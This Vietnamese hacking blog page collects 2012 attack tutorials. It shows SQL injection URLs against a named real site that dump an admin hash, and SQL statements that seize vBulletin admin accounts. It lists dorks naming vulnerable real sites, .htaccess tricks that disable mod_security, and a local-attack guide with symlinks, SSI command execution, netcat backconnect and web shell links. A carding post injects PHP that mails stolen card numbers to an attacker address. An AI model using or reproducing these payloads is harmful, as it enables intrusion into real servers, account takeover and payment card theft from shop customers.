Social Icons

Hiển thị các bài đăng có nhãn Tutorial Hacking. Hiển thị tất cả bài đăng
Hiển thị các bài đăng có nhãn Tutorial Hacking. Hiển thị tất cả bài đăng

Thứ Hai, 13 tháng 8, 2012

[SQL] Check Phimck.com

Get version

Mã:
http://phimck.com/Phim-Online/'%20and%20(select%201%20from%20(select%20count(*),concat((select(select%20concat(version(),0x7c))%20from%20information_schema.tables%20where%20table_schema=database()%20limit%201,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)--%20-.html
Get table: table_user
Mã:
http://phimck.com/Phim-Online/'%20and+(select+1+from+(select+count(*),concat((select(select+concat(cast(table_name+as+char),0x7c))+from+information_schema.tables+where+table_schema=database()+limit+12,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)-- -.html
Get column: user_name và user_password của table_user
Mã:
http://phimck.com/Phim-Online/'%20+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(column_name+as+char),0x7c))+from+information_schema.columns+where+table_name=0x7461626c655f75736572+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--%20-.html
Mã:
http://phimck.com/Phim-Online/'%20+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(column_name+as+char),0x7c))+from+information_schema.columns+where+table_name=0x7461626c655f75736572+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--%20-.html
Get data user_name và user_password
Mã:
http://phimck.com/Phim-Online/'%20+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(concat(0x7c,user_name,0x7c,user_password,0x7c)+as+char),0x7e))+from+table_user+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+.html
và kết quả đây
admin|51d31cdcc6bc148eed78adf4cda28331
readmore...

Thứ Sáu, 3 tháng 8, 2012

Tut hướng dẫn chiếm quyền admin VBB trong data

cách 1: change pass admin trong data
cách 2: change adminpermissions
cách 3: forget pass admin

Yêu cầu:
Có được info data của victim bao gồm:
Code:
$config['Database']['dbname'] = 'forum';
$config['MasterServer']['servername'] = 'localhost';
$config['MasterServer']['username'] = 'root';
$config['MasterServer']['password'] = '123456';
Hiểu biết sơ về câu lệnh SQL

Đầu tiên ta tôi sẽ nói cho các bạn biết về các dạng mã hóa của một vài forum thông dụng hiện nay như:
Code:
1. phpBB : md5($pass) //ko dùng salt
2. VBB : md5(md5($pass).$salt)
3. IPB : md5(md5($salt).md5($pass))
Với
-$Pass là mật khẩu ban đầu.
-$salt là 3 kí tự ngẫu nhiên mà forum tạo ra. (Mục đích: cá nhân quá mật khẩu của member trong db).


OK băt đầu thôi:

Cách 1: change pass admin trong data


Việc đầu tiên ta cần làm là tạo 1 nick trong 4rum victim
Vi dụ nick là hacker pass: 123456
Sau đó connet vào data qua shell
Ta dung lệnh :
Code:
Select * from user
Với lệnh trên thì ta có thể xem dc tất cả user trên 4rum
Nếu 4rum victim có số lượng thành viện cở hơn 3k thì ta dung lệnh

Code:
Select password , salt from user where username='hacker'
Ta dc

Code:
Pass md5 : 5cc70df698ca01c3adb396a08b4873ad
Salt: ?`Y
Q: Tại sao lại phải select from user
A: Ta cần lấy pass mã hóa md5 + salt qua nick mới reg sau đó copy lưu lại.

Tips: bạn có thể lưu lại một số password đơn giản như: 123456, abcdef, 123abc để dễ dàng cho công việc hacking lần sau.

Q:Tiếp tục theo ta xác định ID của nick admin site victim. Nếu trong 4rum victim có nhiều admin ma ta ko bít admin nào có quyền superadmin hay rootadmin, hay admin đã thay đổi userid của rootadmin hay superadmin thì làm sao
A:Bay vào file config.php và tìm các dòng sau

Code:
$config['SpecialUsers']['canviewadminlog']
$config['SpecialUsers']['canpruneadminlog']
$config['SpecialUsers']['superadministrators']
Tìm xem userid của thằng rootadmin hay superadmin là báo nhiêu (Thưởng thì mặt đinh định là userid=1 là rootadmin)

Ta tiếp tục dùung lệnh
Code:
Select password , salt from user where userid=1
Lấy được pass md5 & salt
Vi dụ:
Code:
Pass md5 : eaf1672523371b7736282bbfc2c8b2ac
Salt : 2/D
Tiếp ta dùng lệnh
Update cú pháp thì các bạn có thể tìm hiểu thêm trên google

Code:
Update user set password=’pass md5 của nick mới reg’ ,salt=’ salt của nick mới reg’ where userid=’userid của admin
Câu lệnh hoàn chỉnh như sau:

Code:
Update user set password=’ 5cc70df698ca01c3adb396a08b4873ad’ ,salt=’?`Y’ where userid=’1
5cc70df698ca01c3adb396a08b4873ad là pass md5 của nick hacker
?`Y là salt của nick hacker
1 là userid của thằng admin

Tác dụng của câu lệnh này là
Update pass của thằng admin thành pass của nick mình
ở đây nick hacker có pass là 123456
Để kiểm tra kết quả ta vào 4rum victim đăng nhập bằng nick của thằng admin với password là 123456

Cách 2: Thay phân quyền trong table administrator

ở cách 2 thì không dài và rồm rà như cách 1 .Ta cũng connet vào data victim

dùng lệnh
Code:
update user set usergroupid =’6’ where username=’hacker
tác dung câu lệnh này là nâng quyền cho nick hacker vào group admin
với câu lệnh này nick hacker mới chỉ là admin bình thường … vẫn chưa có toàn quyền trên site victim .
ta tiếp tực dung lệnh
Code:
select * from administrator
với câu lệnh này ta xem dc các userid , adminpermissions, cssprefs còn những table khác ta ko quan tâm
ở đây lại chia ra thêm 2 cách nhỏ:

2.a) Dùng lệnh update
Code:
Update administrator set userid=’userid của nick hacker’ where userid=’userid của admin
Vi dú userid của nick hacker là 5 và userid của nick admin là 1 ta dung lệnh như sau
Code:
Update administrator set userid=’5’ where userid=’1
Thế là nick hacker đã là admin có toàn quyền

2.b) Dùng lệnh INSERT
ở đây ta có info của table administrator như sau
Code:
userid : 1
adminpermissions : 491516
navprefs : NULL
cssprefs :vBulletin_3_CarbonFibre2'
notes : NULL
dismissednews: NULL
languageid : 0
câu lệnh INSERT như sau

Code:
INSERT INTO `4rum`.`administrator` (`userid`, `adminpermissions`, `navprefs`, `cssprefs`, `notes`, `dismissednews`, `languageid`) VALUES ('5', '491516', NULL, ' vBulletin_3_CarbonFibre2', NULL, NULL, '0');
Phân tích câu lệnh

INSERT INTO `4rum`.`administrator` <== INSERT vào table administrator của database tên là 4rum.
Code:
(
`userid` ,
`adminpermissions` ,
`navprefs` ,
`cssprefs` ,
`notes` ,
`dismissednews` ,
`languageid`
)
VALUES (
'5', '2345', NULL , ' vBulletin_3_CarbonFibre2', NULL , NULL , '0' );
<== INSERT colum userid là 5 , adminpermissions là 2345 , cssprefs là vBulletin_3_CarbonFibre2'


Với câu lệnh này ta đã insert userid của nick hacker vào admin (có toàn quyền admin)
(Nếu bạn nào ko hiểu thì có thể tim hiểu thêm trên google)
Xong thử vào admincp của 4rum đăng nhập bằng nick hacker xem thế nào

Cách 3: Forget pass admin

Cách này thì đơn gian hơn 2 cách trên
Cách thức như sau
Vào 4rum victim đặng nhập bằng nick của admin …. Pass thì đánh đại đi
Khi đăng nhâp sai VBB sẽ thông báo và xuất hiện phần nhập mail và lấy lại password
http://victim/4rum/login.php?do=lostpw
nhập email của thằng admin vào rồi nhấp ok
sau đó vào data copy password mã hóa + sail
bỏ vào tool passwordpro
cho crack ở chế độ là số và ngồi đợi …
nếu bạn nào ko muốn đợi thì làm cách này
vào data
update mail của thẳng admin thành mail của mình
khi forget thì nhập mail của mình vào….
Sau khi forget xong vào mail lấy pass

Tut the end
readmore...

Thứ Ba, 24 tháng 7, 2012

Đọc Mọi File Không Cần Shell

 DORK :

download.php?file=
down.php?filename=
down.php?file_name=
download.php?src=
download.php?f=

down tưng file 1 về dọc config lấy thống tiin user+pass localhost vào phpMyAdmin chiếm admin up shell

1 Số VD

Mã:
http://www.vpv.vn/download.php?file=
http://www.mcc.edu.vn/download.php?file=../../home.php
http://nobleromancoins.com/down.php?file=
http://www.lelon.com/down.php?f=index.php&n=index.php  
http://www.homeopathyphysician.com/down.php?file=../index.php
http://www.meta-biomed.com/english/e-notice/down.php?Code=e_data&File=../index.php&FileName=index.php
http://www.vienthong360.com/component/download/down.php?filename=../index.php
http://www.jnszjy.net/down.php?file=../index.php&sort=zzgg&realfilename=index.php
http://dhanvantaricollege.org/down.php?file=../index.php 
http://sciencedvine.org/down.php?filename=../index.php
http://www.chinare.gov.cn/table/down.php?file=
http://www.ykjtj.gov.cn/admin/xxgk/down.php?file_name=../../index.php
http://www.elija.org/download.php?src=../mysql_connect.php
http://www.mnda.gov.ng/download.php?f=mndaCmsPanel/classes/DatabaseManager..php
readmore...

Thứ Hai, 23 tháng 7, 2012

.htaccess (đa chức năng)

Sử dụng tùy trường hợp

cgitelnet symlink htaccess

symljnk ghi vào file.hack
download file.hack về

Options +ExecCGI
AddHandler cgi-script cgi pl cgi love jpg
RewriteEngine on
RewriteRule (.*).mil$ $1.cgi
Options +FollowSymLinks
DirectoryIndex cmd.html
Options +Indexes
RemoveHandler .hack
AddType text/plain .hack


SSI VIEW SYMLJNK
.htaccess

Options +Includes
AddType text/html .shtml
AddHandler server-parsed .shtml

ln -s /etc/passwd tyn.txt

tyn.shtml:

<!--#include virtual="tyn.txt" -->

direct symljnk view file.php dưới dạng file text

options all
Options +FollowSymLinks
Options Indexes FollowSymLinks
DirectoryIndex ssssss.htm
AddType text/plain .php
AddHandler server-parsed .php



Safe mod off

Options +FollowSymLinks
DirectoryIndex ssssss.htm
Options All Indexes
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
SecFilterCheckURLEncoding Off
SecFilterCheckCookieFormat Off
SecFilterCheckUnicodeEncoding Off
SecFilterNormalizeCookies Off
</IfModule>
SetEnv PHPRC /home/user/public_html/php.ini
suPHP_ConfigPath /home/user/public_html/php.ini

or

Options +ExecCGI
AddHandler cgi-script cgi pl cgi love jpg
RewriteEngine on
RewriteRule (.*)\.mil$ $1.cgi
Options +FollowSymLinks
DirectoryIndex cmd.html
Options +Indexes
RemoveHandler .hack
AddType text/plain .hack
## milw0rmvn exploit ##

php.ini:

safe_mode=Off
Disable_Functions=None
Open_Basedir=None
Safe_Exec_Dir=None
Safe_Gid=None
Safe_Include_Dir=None
Sql.safe_mode=None
cURL=Off
MySQL=Off
MSSQL=Off
PostgreSQL=Off
Oracle=Off

or

<IfModule mod_security.c>
SecFilterEngine Off
SecFilterSanPOST Off
</IfModule>
#START #
Options +ExecCGI
AddHandler cgi-script cgi pl tmt

Options +FollowSymLinks
DirectoryIndex seees.html
Options +Indexes

VIEW file.php

Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddHandler txt .html
Require None
Satisfy Any

hạ safe_mode
php.ini

safe_mode = Off
disable_functions = ""

.htaccess

<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
SecFilterCheckURLEncoding Off
SecFilterCheckCookieFormat Off
SecFilterCheckUnicodeEncoding Off
SecFilterNormalizeCookies Off
</IfModule>

.htaccess

AddHandler application/x-httpd-php4 .php .php4 .php3

.htaccess

php_flag safe_mode off
php_flag disable_functions ""

.htaccess

php_admin_value disable_functions ""
php_admin_value safe_mode off

.htaccess

php_value safe_mode off
php_value disable_functions ""

.htaccess

SetEnv PHPRC /home/user/public_html/php.ini

.htaccess

suPHP_ConfigPath /home/user/public_html/php.ini

.htaccess

<Files *.php>
ForceType application/x-httpd-php4
</Files>
readmore...

Thứ Ba, 17 tháng 7, 2012

Các Phương Pháp Local Attack

* Nhắc lại trình tự các bước Local Attack

1- View danh sách các user trong server
2- Tìm file config.php
3- Get thông tin login vào database
4- Crack hoặc change pass admin
5- Login vào quyên quản trị và upshell


1- View danh sách các user trên server

Muốn local được 1 site nào đó trên server thì trướ tiên cần phải xác định site đó có user là gì, từ đó tìm cách đọc file config.php của user đó.


- Một số câu lệnh để get user:

Lệnh phổ biến nhất:
Cat /etc/passwd

Tuy nhiên một số server cấm lệnh cat, có thể sử dụng các lệnh sau một cách linh hoạt

Less /etc/passwd
./cat/etc/passwd
More /etc/passwd

Ngoài ra có thể sử dụng chức năng get user trên shell byg.php, c99.php hay bypass ở r57.php, soleil.pin, telnet.pl hoặc các shell sau:

http://www.mediafire.com/?gic70c6ce441333
http://www.mediafire.com/?hi4gnmu3kpxn095 ( đk: chmod 755)
http://www.mediafire.com/?2rk42hiv9b4ii3f

Pass download: soleil_vhb
Pass dải nén: ceh.vn

- Câu lênh get user & domain

Cat /etc/virtual/domainowners


2- Tìm file path file config.php

Đối với các mã nguồn mở thì path file config được mặc định như sau:
Lưu ý: “path” chính là path từ server dẫn tới site, ví dụ đối với server linux, path là: /home/user/public_html


- Vbulletin:
path/includes/config.php
- Mybb:
path/inc/config.php
- Joomla:
path/configuration.php
- Word-Press:
path/wp-config.php
- Ibp:
path/conf_global.php
- Php-fusion:
path/config.php
- Smf:
Path/Settings.php
- Nuke:
path/config.php
- Xoops:
path/mainfile.php
- Zen Cart
Path/includes/configure.php
- path/setidio:
path/datas/config.php
- Datalife Engine:
path/engine/data/config.php
- Phpbb:
Path/config.php
- Wordpress:
path/wp-config.php
- Seditio:
path/datas/config.php
- Drupal:
path/sites/default/settings.php


- Đây là path mặc định đối với các mã nguồn mở, còn đối với site tự code thì thông thường path vẫn đặt hay ngay sau thư mục public_html ( path/config.php ).

- Đối với các quản trị viên chú ý đến tính năng bảo mật, phòng tránh local attack thì họ thường dấu kỹ và thay đổi path dẫn đến file config, trong trường hợp này cần phải dò path bắt đầu từ file index đi vào. Soleil sẽ lấy ví dụ dò path file config đối với vbulletin chẳng hạn:

Forum.php -> global.php -> includes/class_bootstrap -> includes/init.php -> includes/class_core.php -> includes/config.php

( Để tìm kiếm path trong source, search theo từ khóa: “cwd”, ta sẽ thấy đoạn code tương tự như: “require_once(CWD . '/includes/init.php');” - Đây là path mặc định dẫn tới file init.php))……



3- Get thông tin file config

Phần này chính là phần trọng tâm nhất trong bộ tut local attack. Trong phần này soleil sẽ giới thiệu đầy đủ các kỹ thuật cơ bản để local attack.

3.1- Trước hết ta cần tìm hiểu qua về các câu lệnh cơ bản trong linux ứng dụng cho local attck:

- Ls , dir : Liệt kê tên các file bên trong thư mục
ls -al, ls -lia: Liệt kê tên và thuộc tính các file bên trong thư mục

Ls -lia /home/vhbgroup/public_html/@4rum/includes.config.php

- Cat, ./cat, less, more, tail : View nôi dung bên trong các file:
Cat /home/vhbgroup/public_html/@4rum/includes/config.php
- Ln : Lệnh symbolic link:
Ln -s /home/vhbgroup/public_html/@4rum/includes/config.php soleil.ini
- Cd: Chuyển đổi thư mục

Ví dụ muốn chuyển tới thư mục soleil”
Cd /home/vhbgroup/public_html/@4rum/includes/soleil
cd ~ : Tới thư mục home dictionary
cd -: Quay lại thư mục vừa làm việc
cd ..: Tới thư mục kề bên ngoài thư mục đang làm việc
- Chmod: Phân quyền cho các file hoặc thư mục:
Chmod 400 config.php ( đang làm việc trong thư mục includes chứa file config.php )
- Mkdir: tạo thư mục:

Ví du muốn tạo thư mục soleil trong thư mục includes:
Mkdir /home/vhbgroup/public_html/@4rum/includes/soleil
- Touch : Tạo file:

touch /home/vhbgroup/public_html/@4rum/includes/soleil.php
- Tar, zip: Lệnh nén và giải nén: thường sử dụng trong symlink root
Tar –zcvf ducdung08clc.tar.gz soleil ( Nén thư mục soleil thành file ducdung08clc.tar.gz)
Tar –zxvf ducdung08clc.tar.gz ( giải nén file ducdung08clc.tar.gz)

Zip –r -9 ducdung08clc.zip soleil ( Nén thư mục soleil thành file ducdung08clc.zip)
Zip -p ducdung08clc.zip ( Giải nén file ducdung.tar.gz)
…………

3.2- Phần tiếp theo Soleil sẽ trình bày 1 số kỹ thuật dùng để lấy thông tin file config.php


1- Sử dụng các lệnh cat, dir để xem tên thư mục, tệp tin và đọc nội dung tệp tin.

Ví dụ:
dir /home/vhbgroup/public_html/includes
cat /home/vhbgroup/public_html/includes/config.php

Nhưng hiện nay phần lớn các server đều không cho phép thực thi những hàm này nên ứng dụng phương pháp này không mấy khả thi

2- Sử dụng Symbolic link – Gọi tắt là symlink

Symbolic link là kỹ thuật cơ bản và gần như là quan trọng mà phần lớn các attaker nghĩ đến đầu tiên trước khi thực hiện công việc local attack.

Ln -s /home/vhbgroup/public_html/@4rum/includes/config.php soleil.ini

Có thể hiểu đơn giản là tạo 1 file soleil.ini trên host có nội dung giống file config.php của user vhbgroup trên server có path /home/vhbgroup/public_html/@4rum/includes/config.php
Có thể thay soleil.ini bằng .txt nhưng do thói quen soleil vẫn hay sử dụng .ini hơn bởi vì đối với 1 số server bị lỗi nó có thể bypass permissions 400.



3- Sử dụng symlink kết hợp với ssi:

Đối với 1 sô server khi symbolick link bình thường xuất hiên 403 forbinden – không cho phép đọc file đã được symlink thì giải pháp được nghĩ đến đó là kết hợp với ssi.
- Tạo 1 file ducdung08clc.shtml với nội dung như sau:

<!--#include virtual="soleil.ini"-->

Trong đó file soleil.ini là file đã được symbolic link trên server.
Bây giờ view source của file ducdung08clc.shtml ta sẽ thấy đc nội dung file soleil.ini đã symbolic link.

4- Chạy lệnh bằng file .shtml

- Tuy nhiên có 1 số server cả 2 cách đó đều không áp dụng được nhưng nó lại cho chạy lệnh bằng file .shtml

<!--#exec cmd="cat /etc/passwd"-->

- Lệnh xem file logs như sau:

<!--#exec cmd="tail -n 10000 /var/log/httpd/domains/vhbgroup.net.error.log"-->

Lưu ý: + lệnh tail cũng giống như lệnh cat nhưng nó dùng để xem nhưng dòng cuối cùng của file trên server.
+ /var/log/httpd/domains/vhbgroup.net.error.log là path dẫn đến file error.log của direct admin
+ Còn path dẫn đến file error.log của cpanel là: /usr/local/apache/logs/error_log ….., tùy vào bộ cài host mà path dẫn đến file error.log khác nhau.


5- Get all config toàn server



- Đâu tiên download shell get all config ( w.php) về rồi up lên server.

http://www.mediafire.com/?hi4gnmu3kpxn095 ( pass unlock: soleil_vhb )








- Click vào done và thư mục có tên là tmp sẽ được tạo ra.

- Vào link của thư mục tmp sẽ có 1 số shell với các chức năng sau:

+ dz.sa : Đây là shell cgi, sử dụng nó để get các user trên server bằng cách thực thi câu lệnh: cat /etc/passwd, more /etc/passwd ( Pass login là: dz ).
+ user.sa : Shell này dung để xem danh sách các user và domain trên server.
+ config.sa : Shell này có nhiệm vụ thực thi get all config bằng phương pháp symlink








- Vào link shell http://www.vksbinhphuoc.gov.vn/soleil/tmp/config.sa

- Coppy toàn bộ thông tin user có được từ câu lệnh: cat /etc/passwd vào khung như hình ảnh dưới đây rồi ấn “get config”







- Cuối cùng trở lại link http://vksbinhphuoc.gov.vn/soleil/tmp/ , chúng ta sẽ có được danh sách các file config của các site trên server.







* Đặc điểm của con shell get all config này:

+ Là 1 công cụ cực kỳ thuận tiện, giảm bớt thời gian và công sức khi local attack
+ Chỉ sử dụng đối với các server cho chạy shell cgi và cho quyền symlink
+ Không bypass được, chỉ symlink đối với các site chưa chmod và có path dẫn đến file config là mặc định.


6- Symbolink Root:

- Download file r00t.tar.gz về và upload lên host:
http://www.mediafire.com/?21kycoh4g5s4ojo ( pass download: soleil_vhb, pass dải nén: ceh.vn )
- Sau đó giải nén file root.tar.gz, sử dụng lệnh sau:
Tar –zxvf r00t.tar.gz
- Up file .htacess cùng thư mục với file r00t:

Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddHandler txt .html
Require None
Satisfy Any

- Nếu không sủ dụng file r00t.tar.gz đó, có thể thực hiện sym root ngay trên shell

Demo:
http://tnmthatinh.gov.vn/soleil/r00t/


Và đây là cấu trúc của trường http://cdhh.edu.vn/

http://tnmthatinh.gov.vn/soleil/r00t...h/public_html/


7- Backconnet:

Có thể hiểu đơn giản là kết nối bằng cổng sau, nghĩa là sử dụng shell backconnet và tool netcat (nc.exe) để mở sẵn 1 cổng trên server, sau đó từ máy tính của attacker kết nối với server qua cổng đã được mở sẵn đó. Mọi câu lệnh thực thi đối với server có thể thực hiện trên máy tính của attacker qua command line.

Đồ nghề cần thiết:

- Tool netcat (nc.exe)
http://www.mediafire.com/?npsob8c7dd9nr40

- Shell back connect đối với asp:
http://www.mediafire.com/?etciiuskzvyhjcw

Chú ý, trong shell có 1 đoạn code như: "G:\domains\tvled.vn\wwwroot\austdoor\design\nc.ex e -l -p 1234 -e cmd.exe -d"
Lúc up shell lên cần edit lại “G:\domains\tvled.vn\wwwroot\austdoor\design\” thành path của server dẫn tới file nc.exe.

- Shell backconnet đối với php
http://www.mediafire.com/?8o1sj35cs51lsiw

( Pass unlock soleil_vhb; Pass dải nén: ceh.vn )

- Download tool nc.exe rồi đặt trong ổ C chẳng hạn, sau đó mở cửa sổ command line và sử dụng netcat để mở cổng trên local host kết nối với server đã mở sẵn cổng

- Cú pháp: + chế độ kết nối : nc [-tùy_chọn] tên_máy cổng1[-cổng2]
+ chế độ lắng nghe: nc -l -p cổng [-tùy_chọn] [tên_máy] [cổng]


Một số câu lệnh có thể sử dụng:
nc -nvv -l -p 80
nc -lvvnp 3333
nc -nvv -l -p 12345
nc 127.0.0.1 7777
nc -vv -l -p 7777
nc -vlp 443


+ -l: đặt netcat vào chế độ lắng nghe để chề kết nối đến
+ -n: Chỉ dùng ip ở dang số, ví dụ: 123.30.2.42, netcat sẽ ko xét đến DNS.
+ -p: Chỉ định cổng cần lắng nghe hay kết nối
+ -v: Hiện thi các thông tin về kết nối hiện tại. –vv sẽ hiện thị thông tin chi tiết hơn nữa.

- Lưu ý là cần coppy nc.exe vào 1 vị trí nào trong máy rồi sử dụng command đến thư mục chứa nc.exe trước khi thực hiện các câu lệnh liên quan đến netcat

- Sauk hi đã backconnect thành công thì tiến hành local đơn giản chỉ bằng 1 câu lệnh coppy shell từ site đã up được shell tới site victim.


8- Via SQL
- Login vào database và tạo 1 table để load các thông tin bằng cách sử dụng querry sau

create table soleil ( ducdung08clc varchar (1024));

- Query load các thông tin vào table table vừa được tạo:

load data local infile '/etc/passwd' into table soleil

Có thể thay câu lệnh “/etc/passwd” bằng path dẫn đến file config.

- Query hiện thị các thông tin được load vào table soleil:

select * from soleil

- Phương pháp này được gọi là Via SQL, chủ yếu sử dụng khi server không cho chạy run command và có thể bypass đối với 1 số server.

1 số lưu ý:

- Đối với 1 số server Safe_mod: ON, thì shel không có chức năng run command để thực thi các câu lệnh, vậy làm sao có thể local được. Giải pháp được nghĩ đến là sử dụng shell cgi:









+ Soleil.pin

http://www.mediafire.com/?4k94v1i0shmr46c
Cách sử dụng:
- Up shell soleil.pin và chmod nó về 755
- Up hoặc tạo file .htaccess trong thư mục chứa shell có nội dung:

## START ##
Options +ExecCGI
AddHandler cgi-script cgi pl cgi gmc pin jpg
RewriteEngine on
RewriteRule (.*)\.mil$ $1.cgi
Options +FollowSymLinks
DirectoryIndex cmd.html
Options +Indexes
RemoveHandler .hack
AddType text/plain .hack
## milw0rmvn exploit ##

Hoặc:
Options FollowSymLinks MultiViews Indexes ExecCGI

AddType application/x-httpd-cgi .cin

AddHandler cgi-script .pin
AddHandler cgi-script .pin

+ telnet.pl

http://www.mediafire.com/?t9cavs1n0ipthq1
shell telnet.pl có chức năng hoàn toàn tương tự với con shell soleil.pin. Tuy nhiên cách thức sử dụng nó thì đơn giản hơn nhiều vì không phải sử dụng đến file .htaccess mà chỉ cần chmod nó về 755 là chạy được.







( Pass unlock: soleil_vhb, pass dải nén nếu có : ceh.vn )

- * Đối với các server không có chức năng run command và cũng không cho chạy shell cgi thì có thể sử dụng các shell sau để bypass đơn giản đối với 1 số server.

+ facesymlink.php
http://www.mediafire.com/?fc9kencnilx0rm4 ( 5.2.12 -> 5.3.1
http://www.mediafire.com/?kmid8rahl5wjh74 ( version 5.3 -> 5.4 )

+ 529bypass.php
http://www.mediafire.com/?cls0e5k873w83ef

+ Bypassnull.php
http://www.mediafire.com/?1x0zxmig5ctwezr

+ Hoặc sử dụng safe mode bypass
http://www.mediafire.com/download.php?38d13jgqw132db2

+ Sử dụng các chức năng bypass trên con shell r57vip này ( nên convert domain sang dạng ip)
http://www.mediafire.com/?sqjs5du3srlifqt

+ Hoặc sử dụng via sqli
v.v….

(Tất cả các shell download trên đều có pass unlock: vhb_soleil và pass dải nén nếu có: ceh.vn)

Trong bài tut trên soleil đã giới các phương pháp local attack cơ bản và các dạng bypass cơ bản nhất có thể sử dụng. Trong bài tiếp theo soleil sẽ đề cập đến các dạng bypass nâng cao đối với 1 số server khó, các thủ thuật vượt chmod qua 400 permission, chiếm quyền điều khiển root (get root) và các kỹ thuật up shell đối với 1 số mã nguồn mở như: joomla, worpress, nukeviet, vbulletin, drupal……
readmore...

Hướng Dẫn bug SQL và khắc phục khi gặp lỗi !

1.Bước đầu tiên trong khi khai thác SQL chính là tìm lỗi:Có các cách tìm lỗi sau :
- Thêm dấu ' vào trang web trả về :

Quote:
Quote: You have an error in your SQL syntax,supplied argument is not a valid MySQL
Quote:
Quote:
warning mysql_num_rows supplied argument is not a valid mysql result resource
Thì chắc chắn là trang web đã bị lỗi SQL
-Thêm dấu ' vào , trang web trả về trang trắng hoặc một phần của trang thì nguy cơ trang đó dính lỗi là rất cao --> thử khai thác tiếp
-Thêm and 1=1 và 1=0 , trang web trả về trang trắng hoặc một phần -> dính lỗi
2.Tìm số field,column:Ta sử dụng câu lệnh order by để tính số field , số column trong cơ sở dữ liệu SQL
Để tiết kiệm thời gian các bạn order by để xác định khoảng rồi tìm ra số column
-Nếu order by 100-- - mà trang web đưa về lỗi
Quote:
Quote:
Error: Unknown column '100' in 'order clause'
Quote:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
Thì các bạn tiếp tục giảm dần xác định khoảng rồi tìm ra
-Nếu order by 100-- - mà nó vẫn ra nguyên trang ban đầu thì các bạn thử thêm dấu ' sau phần id xem , nếu nó ra lỗi thì tiếp tục giảm dần để xác định khoảng
-Nếu cả 2 cách trên không được thì bạn ko dùng order by nữa , chuyển sang union select để tìm luôn ( cách này hơi mất thời gian )
3.Tìm số lỗi:Bạn dùng lệnh union select để tìm ra số lỗi .
-Nếu nó hiện ra số lỗi bình thường thì các bạn tiếp tục khai thác thôi
-Nếu nố không hiện ra số lỗi thì các bạn có thể thực một trong các cách sau :
+Viewsource để tìm số lỗi
+Xem các hình ảnh để tìm số
+Thay các column bằng null : null,null,null
+Thấy số id bằng null hoặc false
+Một số trường hợp khi bạn bỏ dấu - trước số đi lại có thể thấy số lỗi
+Dùng + hoặc alt + 255 thay cho dấu cách , viết hoa UNION SELECT
4.Khai thác

-Get thông tin về user , data , version
+Các bạn get version để biết hướng khai thác (MySQL ver 4 hoặc 5) : version() hoặc @@version hoặc có thể là convert(version() using latin1)
+Get user vầ database tương tự
-Get table và column
+Gat table : đối với MySQL 4 thì ta chỉ có thể đoán , mình đang tổng hợp lại các table và column hay dùng , còn đối với MySQL 5 thì chúng ta khai thác như sau
union select unhex(hex(group_concat(table_name))) from information_schema.tables where table_schema=datase()
+Get column : UNION SELECT GROUP_CONCAT(COLUMN_ NAME) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA=DATABASE() AND TABLE_NAME=0xtable_name
Convert table_name sang hex hoặc cũng có thể dùng CHAR(...)

5.By pass

-Khi query một số site nó chặn các hàn union , select , convert ,.... thì khi query nó trả về trang trắng , lúc này ta thấy đổi bằng các chữ hoa thường xen kẽ nhau :uNiOn , SeLeCt ,CoNvErT ,....
-Khi query nó trả về lỗi

Quote:
Quote:
Forbidden
You don't have permission to access /... on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
hoặc
Quote:
Quote:
Not Acceptable
An appropriate representation of the requested resource / could not be found on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request
thì ta thay thế union hoặc select bởi /*union*/ hoặc /*!union*/ ( /*select*/ hoặc /*!select*/)

-Khi query nó trả về lỗi

Quote:
Quote:
406 Not Acceptable
This request is not acceptable Powered By LiteSpeed Web Server
LiteSpeed Technologies is not responsible for administration and contents of this web site!
thì ta thay thế space bởi %0A
-Khi query nó trả về lỗi
Quote:
Quote:
Error 500: Internal Server Error
The server encountered an unexpected condition which prevented it from fulfilling the request.
The problem is on the server side, not with your browser or the address. Most probably, a certain service (e.g., Tomcat engine) is down. Please contact your webmaster.
thì các bạn query id=.. and (select 1)=(select 0xAAAAAAAAAAAAAAAA 1000 A nhé) union select 1,2,3....
readmore...

Thứ Ba, 10 tháng 7, 2012

Video Local Sieutocdo.com

readmore...

TUT Hack CC

allinurl: /sub.php?Page=1
chuyển về dạng
http://abc.com/detail.php?pid=....
hack bằng tool hoangduye cũng được mà havij cũng được,hack bằng cái gì cũng được

get admin ( trong table user nhớ gét colums role để tìm admin ,pass mã hóa sha1( admin thường thì role là 1)

link admin
http://abc.com/admin_login.php

http://abc.com/cp
vào admin phần category up shell lên để đuôi php hoặc .jpg.php tùy thích

tiếp theo vào shell sửa file orderconfirm.php ( tùy file tùy shop cách tìm file này là vào shop order đến phần nhập cc sau đó hiện comfim sẽ ra name file http://abc.com/file can edit .php

vào shell tìm file đó

sau đó tìm đoạn này

<? echo

"" . substr($card_no,-4) . "<br>" .

$ex_month . "/" . $ex_year . "<br>" .

$cid;

?>
thường thì code gốc là hiện 4 số cuối của cc

sửa số màu đỏ thành số 0

sau đó gán thêm hàm này vào phía dưới
<?

$to = 'tmtno1@vnhack.us';

$subject = 'CC - Order ID:'+$order_id; $message = $order_id."|".$card_type."|".$card_no."|".$ex_mont h."|".$ex_year."|".$cid."|".$bill_name."|".$bill_a ddress."|".$bill_city."|".$bill_state."|".$bill_zi p."|".$bill_dphone."|".$bill_country; $headers = 'From: webmaster' . "\r\n" . 'Reply-To: webmaster' . "\r\n" .

'X-Mailer: PHP/' . phpversion();

mail($to, $subject, $message, $headers);

?>
notice : do file order chính mã hóa nên hack cc bằng cách sử file nối đến file order chính,cc k đảm bảo live 100%,chuẩn bill 100%

